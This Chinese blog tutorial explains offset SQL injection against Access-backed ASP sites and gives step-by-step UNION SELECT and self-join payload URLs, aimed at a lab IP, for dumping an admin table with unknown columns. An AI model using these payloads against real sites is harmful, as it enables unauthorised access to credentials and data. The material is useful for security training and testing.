• ACCESS数据库偏移注入


    偏移注入主要是针对知道表,但是不知道字段的ACCESS数据库。

    比如我们已经知道了表名是 admin

    1. 判断字段数:
    http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 22            返回正常
    http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 23           返回错误
    
    字段数为 22
    
    1. 爆出显示位:
    http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
    

    1. 判断表内存在的字段数:
    http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin       返回同上图一样得显示位页面
    http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,* from admin   返回错误
    
    说明了admin表下有16个字段。
    
    1. 偏移公式如下:
      order by 出的字段数减去 * 号判断出的字段数,然而再用order by的字段数减去2倍刚才得出来的答案
    1.   22-16 = 6 
    2.   22-(6*2) = 10
    所以答案就是  10
    
    1. 注入公式如下:(爆破内容是随机的)
      一级偏移注入公式:
    http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
    
    此时可以增加a.id或者b.id或者a.id和b.id一起加上去来改变随机爆破出来的内容比如:
    http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)
    
    

    二级偏移注入公式:

    http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
    
    此时可以增加a.id或者b.id或者a.id和b.id一起加上去来改变随机爆破出来的内容比如:
    http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
    

    注意:这里是10个字段再减去了表里的6个字段,所以二级偏移这里是select 1,2,3,4

    注意:查看源代码有奇效,可能会出现惊喜

  • 相关阅读:
    logstash收集nginx日志
    logstash收集java日志,多行合并成一行
    一个配置文件收集多个日志-if根据type类型判断
    CentOS 7 kibana安装配置
    CentOS7 logstash配置部署
    Centos7 Elasticsearch部署
    awk命令
    top命令
    java中的getClass()函数
    java容器
  • 原文地址:https://www.cnblogs.com/zane-s/p/12672374.html
Copyright © 2020-2023  润新知